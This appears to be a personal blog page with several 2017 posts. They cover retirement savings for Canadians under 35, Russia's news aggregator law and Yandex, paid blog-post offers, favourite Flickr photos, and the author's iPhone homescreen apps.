So it was with interest, and trepidation, that I listened to a podcast put out by TVO entitled “Creating Retirement Security.” The conversation they had about people in their 30s was strange to my ears, with guests relying on different baseline facts for their assessments and recommendations. And significantly, not one of the guests recognized that loan payments for student debt are higher than with past generations, nor that repayment periods are longer now than in the past. Several of the guests held an assumption that persons would be saving in their early 20s. While this practice might be true for Canada Pension Plan (CPP) contributions it’s presumably less the case for Registered Retirement Savings Plans (RRSPs) that can grow significantly over the course of 40 years.

Each guest called frequently for ‘financial literacy’. While educational approaches matter and have merit, at the same time such calls assume that retirement decisions should be individualized. Does it fall to specific individuals to ensure that they are earning enough, saving enough, and investing wisely enough to be secure in their retirement? Or is retirement and aging a collective action problem that is best solved as a society as a whole?2

As with many areas of expert knowledge, only the barest basics of financial literacy are likely to catch on with the general public. Were we, as a society, to take some of the lessons from behavioural economics, we’d realize that experts are needed to develop appropriate ‘nudges’ to compel savings,3 while also updating savings models to recognize the precariousness of the labour market for those under 35. The constant threat of un(der)employment, the need to service student debt, and the potential need to provide assistance to parents who have insufficiently saved for their retirement are all pressures on the largest generation now moving through the Canadian workforce. And that’s to say nothing of the need for people to decide whether they want to save for their retirement or save for a home that they own. Until all those variables and conditions are appreciated, any advice from experts seems to just fall flat.


Great Photography Shots

Flickr released the best 25 shots of 2017 and they’re pretty amazing. The ‘best’ in this case is derived from social and engagement metrics, combined with curation by Flickr’s own staff.

“Say Goodby…” by Iwona Podlasinska, at https://flic.kr/p/ZYM6Hd
“Mi Fuego” by Albert Dros at https://flic.kr/p/Tbcpio

Music I’m Digging

Neat Podcast Episodes

Good Reads for the Week

Cool Products

  1. I actually do save every month to the tune of about 10-15% of my paycheque, part for retirement and part for an emergency fund.
  2. Guests did spend some time talking about whether retirement savings should be an individualized/collective problem. But the constant refrain that individuals need to be smarter means that individuals, first and foremost, are seen as the parties that have to assume responsibility for their futures, and any collective action work is an idealized maybe-solution to aging in Canada.
  3. To be fair, nudges were discussed, but the hard lessons came down on individuals having to gain literacy to make their own decisions.

How Russia Polices Yandex

From Vice Motherboard:

This year, the “news aggregator law” came into effect in Russia. It requires websites that publish links to news stories with over one million daily users (Yandex.News has over six million daily users) to be responsible for all the content on their platform, which is an enormous responsibility.

“Our Yandex.News team has been actively working to retain a high quality service for our users following new regulations that impacted our service this past year,” Yandex told Motherboard in a statement, adding that to comply with new regulations, it reduced the number of sources that were aggregated from 7,000 to 1,000 with “official media licenses.”

The predictable result of the Russian government’s new law is that the government can better influence what information is surfaced to Russian citizens: when state news outlets release the same press release, en masse, readers of Yandex1 and other major aggregators with large audiences are predominantly exposed to what the government wants them to see. So while Russia may interfere with foreign countries’ political processes by exploiting how social network and aggregator algorithms function (along with out-and-out illegal exfiltration and modification of communications data), they are, themselves, trying to immunize against equivalent kinds of threats by way of the liabilities they place on the same kinds of companies that do business in Russia.

More broadly, the experience in Russia and the changes in how Yandex operates should be a warning flag, and a call for caution, to advocates in the Western world who are calling for social media companies to be (better) regulated, such as by striking down or modifying Section 230 of the Communications Decency Act (CDA). While there are clear dangers associated with these companies operating as contemporary digital sovereigns, there are also risks associated with imposing harsh liability systems for publishing other persons’ content.

While such regulations might reduce some foreign interference in political systems, they could simultaneously diminish how often legitimate alternative sources of information are surfaced to the public. It remains unclear just how we should regulate the spread of malicious political messaging2 but, at the same time, it’s critical to ensure that any measures don’t have the detrimental effect of narrowing and diminishing the political conversations in which citizens can participate. It’s the very freedom to have such conversations that distinguishes free democratic countries from those that are more autocratic.

  1. Sidenote: Yandex is the only website I’ve ever had to block from scraping my professional website because it was functionally acting as a DDoS.
  2. One idea would be to deliberately cut down on how easy it is to spread any and all information. By requiring additional manual effort to share content only the most motivated would share it. Requiring actual humans to share content with other humans, if done in a robust way, might cut down on the ability of bots to automatically propagate content as though ‘real’ people were sharing it.

Om Malik on the Blog Post Bribe Scandal

He writes:

The chase for cheap page views to arbitrage against advertising dollars is the real reason everyone at these mega page view factories willingly embraced this trend towards free content, which in turn left the whole experiment open to abuse. If you generate a lot of page views for these sites, you aren’t going away, because, in the end, it is all about page views.

On my other, professional, site I regularly receive requests from marketers to publish their content for some sort of payment. Many are outlandish in their requests whereas others have clearly done their homework and identified a range of posts the given brand wants to be associated with.

Some of the payment rates or product offerings are outlandish, others churlish, but none of them have ever overcome my baseline position: I own my professional web presence in order to build my reputation and brand. That brand is worth more than a few hundred or thousand dollars; it represents, at least in part, my ability to earn money over the span of the coming decades.

While there’s been some comic back and forth about charging marketers tens or hundreds of thousands of dollars to post other parties’ branded content, I think there is legitimately something to the idea. If you view your web presence as a long-term part of your career, and damaging that presence could potentially cost you in terms of future employment opportunities or consulting prospects, then that kind of valuation starts to make some sense.


What’s On My Homescreen, December 2017 Edition

Screenshot of my iPhone 7 homescreen from December 2017

My homescreen is mostly divided between stuff that I want immediate access to on a very regular basis and one or two ‘testing’ applications (in terms of position on the homescreen and/or whether I like them as applications). Without further ado:

Photography (Folder): I play with a lot of different photo apps, though I tend to alternate between Darkroom and Snapseed a fair bit and rarely use Polar anymore. Slow Shutter is something I’m playing around with off and on, and ProCam was free.

Reminders: I don’t like the application but since I basically just use it for groceries I’m not willing to spend money for a ‘better’ app.

Notes: Much of my life exists in Notes. I wish there was better support for markdown and would love tagging support. And it’d be great if Apple would fix the freezing bug that was introduced in iOS 11! But on the whole Notes plays well across all my Apple devices and the interface just gets out of the way.

Messages: Not my default means of communicating with people, in part because I try to avoid sending SMS messages as best I’m able for security reasons, but it’s a necessary evil in my life.

Phone: I take and make a lot of calls.

WhatsApp: My preferred method of communicating because it’s a cross-platform app (don’t need to know if someone is on an iPhone, Android, Blackberry, or whatever else) and encrypts voice-, video-, and text-based messages end-to-end. Still, it leaks some metadata and so, in some instances I use…

Signal: The best of the consumer-available secure messaging apps. Unlike WhatsApp, Signal keeps the bare minimum amount of information required to process communications.

Podcasts: I listen to silly numbers of Podcasts. I had problems with the application in iOS 9 but they seem to have been fixed in iOS 10/11. Importantly, the application syncs well across all the Apple devices that I own.

Hello Weather: I wish I could download and use Dark Sky but it’s not available in the Canadian App Store. Hello Weather pulls data from the same repository as Dark Sky so it’s as accurate, if not as pretty.

Day One: I’ve kept digital journals in one format or another for well over 15 or 16 years. I’ve been using Day One for a few years and love the interface.

Ulysses: I keep coming back to Ulysses even though I don’t derive any joy from using it. It’s certainly functional and lets me publish to my WordPress websites and I enjoy how it does markdown. But the interface is the definition of ‘meh’ for me.

Reeder: Too much of my time is spent in Reeder. I follow a lot of wonky websites and blogs, plus fashion, tech, culture, and more. So much to read and so little time!

Paprika: A relatively new application in my life; I’m seeing whether the application fits into my life. Previously I was using the Notes app to keep track of recipes but that didn’t scale very well. My hope is that Paprika really does take over part of my life and make shopping that much more pleasant.

iBooks: For pleasure reading I only purchase digital copies through iBooks. I realize it’s a walled garden but I’ve long since made my peace with that.

Activity: I’ve tracked my baseline activity information for almost ten years and this app collects daily information from my Apple Watch. I use a separate application — Healthview — to study longer-term trends in my personal fitness and health.

Halide: The newest application in my life! Though I usually shoot with my mirrorless camera, sometimes it’s not convenient and so I whip out my iPhone. Halide gives me more control over what I’m shooting and I really appreciate the ability to turn on focus peaking.

Safari: Because I, too, browse the Internet.

Mail: It’s not the best of clients but it’s as bad as most. And the really good ones would force me to move my mail through additional third-parties, and I’m not willing to engage in that kind of activity.

Tweetbot: I use Twitter a lot and a large portion of my professional network is located there. But the official Twitter application is just horrible in my view, whereas Tweetbot gets out of my way and lets me just enjoy the content streaming by.

Music: I usually have music playing in the background if I’m not listening to a podcast.